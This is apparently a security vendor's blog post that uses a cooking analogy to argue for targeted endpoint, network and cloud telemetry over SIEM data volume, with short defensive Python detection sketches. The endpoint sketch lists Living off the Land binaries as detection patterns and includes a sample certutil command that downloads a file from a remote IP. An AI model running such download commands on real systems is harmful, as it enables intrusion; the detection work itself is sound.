
What is the Recipe for Threat Detection?

I grew up in a family restaurant and learned to cook around age 8. My food wasn’t good, though. It was too busy. I was trying too hard. A simple lesson all good cooks know is that less is more. Too many ingredients and spices make dishes bland because nothing stands out.


After working in cybersecurity for the past decade, I can confidently say the same logic applies to threat detection. You can’t throw everything into a pot and hope for a good result. The right data, used in the right way, delivers far better outcomes than a strategy built on sheer data volume.


SIEMs: Too Many Cooks Spoil the Broth

Threat detection is undeniably a data problem, so it is logical to look for a data-focused solution. Enter the SIEM. SIEMs started coming onto the market around 2005. When I worked as a security analyst, simply being presented with the relevant firewall, IDS, AV, and OS logs was enough to identify a true-positive security issue. But much has changed since 2005.

Today, security controls such as NGFW and NGAV do a great job of preventing known threats, which reduces the overall event volume an organization has to deal with. However, most controls do a poor job of providing the granular information, what we call telemetry, that can be used to detect threats that have not been prevented. Typical SIEM deployments aim to detect threats by letting users configure rules so that a manageable number of qualified alerts are produced. The problem is, a broken clock is right twice a day. Most organizations spend a lot of effort getting their SIEM into a state where event volume is manageable, only to discover the alerts are mostly false positives. They then seek out additional security controls and integrations, only to discover that the SIEM needs more: more tuning, more storage, more processing power. The cycle of playing with the volume knobs, spending more on consulting, and chasing false positives continues, and none of it dissuades the adversary in any way.


The Best Dishes Are Made with the Best Ingredients

Starting with the premise that threat detection is the practice of automatically finding suspicious or malicious activity that has NOT been prevented by security controls, let us look at what ingredients should be in our threat detection recipe.

  • Endpoint Telemetry – This is the most basic ingredient of threat detection. Adversaries who are not stopped by security controls very often establish a foothold in an organization through a workstation or server. From there, “Living off the Land” techniques are employed. You can check out the LOLBAS GitHub project (Living off The Land Binaries and Scripts) to understand more about these techniques. Endpoint telemetry from well-instrumented EDR, NGAV, and similar endpoint tools provides the raw data needed to detect Living off the Land activity; a minimal detection sketch appears after this list. This activity can typically be caught early in the intrusion process (during discovery, defensive evasion, lateral movement, and data collection). You can read more about Living off the Land and other findings from hundreds of our incident response engagements by downloading the free Incident Response Insights Report.
  • Network Telemetry – NGFWs and other network security controls still have a critical part to play in threat detection, but not in the way most SIEMs process the data. Most SIEMs try to prioritize alerts from network controls by using rules and correlation to upgrade or downgrade the alert from the vendor’s default. There are simply too many alerts generated by most network controls for this strategy to work. Network telemetry should instead be used to capture as many netflows and DNS requests going in and out of the environment as possible. This is critical because not every IP-enabled device can run EDR/NGAV tools, but they can all be compromised. Statistical analysis of netflows alone can yield true-positive alerts, but the ratio of true to false positives tends to be very low; a simple baselining sketch follows this list. (A great, short outline of the pros and cons of this approach can be found in a blog post by Anton Chuvakin.) Correlating alerts and netflows with higher-fidelity information helps in investigations.
  • Cloud Telemetry – As more workloads, applications, and IT assets move to cloud models, telemetry from various cloud applications and APIs is critical to achieving full visibility across an organization. Universally, data and events about authentication and user activity in the cloud are essential. Some organizations may get additional value from gathering application or transaction data, but almost all notable breaches involving cloud assets or services hinged on credential theft or abuse, or on access permissions. In other words, not “hacking” in the academic sense, just good ol’ fashioned theft and fraud. A sketch of a simple authentication-telemetry check appears after this list.
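
To make the endpoint ingredient concrete, here is a minimal sketch of the kind of check endpoint telemetry enables: flagging process-creation events where a known Living off the Land binary is launched with network- or script-related arguments. The field names (host, parent, process, command_line) and the specific binaries and argument tokens are illustrative assumptions, not the schema or detection logic of any particular EDR product.

```python
# Hypothetical process-creation telemetry check for "Living off the Land" activity.
# Field names and token lists are assumptions for illustration only.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
SUSPICIOUS_TOKENS = ("-urlcache", "http://", "https://", "/i:", "javascript:")

def flag_lolbin_activity(events):
    """Yield events where a known LOLBin runs with network- or script-related arguments."""
    for event in events:
        process = event.get("process", "").lower()
        cmd = event.get("command_line", "").lower()
        if process in LOLBINS and any(token in cmd for token in SUSPICIOUS_TOKENS):
            yield event

if __name__ == "__main__":
    sample = [
        {"host": "ws-042", "parent": "winword.exe", "process": "certutil.exe",
         "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt c:\\temp\\a.txt"},
        {"host": "ws-042", "parent": "explorer.exe", "process": "notepad.exe",
         "command_line": "notepad.exe notes.txt"},
    ]
    for hit in flag_lolbin_activity(sample):
        print("Suspicious LOLBin use:", hit["host"], hit["command_line"])
```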
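
For the network ingredient, the statistical approach mentioned above can be illustrated with a rough baseline-and-deviation check over netflow volumes. This is a sketch under assumed flow fields (src, bytes_out) and an arbitrary z-score threshold; as noted, such analysis on its own tends to be noisy and is best paired with higher-fidelity data during investigation.

```python
from collections import defaultdict
from statistics import mean, pstdev

def outbound_volume_outliers(flows, z_threshold=3.0, min_history=10):
    """Flag source hosts whose latest outbound byte count far exceeds their own baseline."""
    history = defaultdict(list)
    for flow in flows:                       # flows assumed ordered oldest -> newest
        history[flow["src"]].append(flow["bytes_out"])

    outliers = []
    for host, volumes in history.items():
        if len(volumes) < min_history:       # not enough history to form a baseline
            continue
        baseline, latest = volumes[:-1], volumes[-1]
        mu, sigma = mean(baseline), pstdev(baseline)
        if sigma > 0 and (latest - mu) / sigma > z_threshold:
            outliers.append({"src": host, "latest_bytes": latest, "baseline_mean": round(mu, 1)})
    return outliers

# Example: one host with a sudden outbound spike relative to its own history.
flows = [{"src": "10.0.0.5", "bytes_out": b}
         for b in [120, 130, 110, 125, 118, 122, 131, 127, 119, 50_000]]
print(outbound_volume_outliers(flows))
```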
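
And for the cloud ingredient, a simple pass over authentication telemetry can surface the credential theft and abuse pattern described above, for example a burst of failed sign-ins followed by a success from the same source. The event fields (user, source_ip, result, timestamp) and the failure threshold are assumptions; real cloud audit log schemas differ by provider.

```python
from collections import defaultdict

def failed_then_success(events, failure_threshold=10):
    """Return (user, source_ip) pairs where many failed sign-ins precede a success."""
    failures = defaultdict(int)
    suspicious = []
    for event in sorted(events, key=lambda e: e["timestamp"]):
        key = (event["user"], event["source_ip"])
        if event["result"] == "failure":
            failures[key] += 1
        elif event["result"] == "success":
            if failures[key] >= failure_threshold:
                suspicious.append(key)
            failures[key] = 0               # a success resets the failure streak
    return suspicious
```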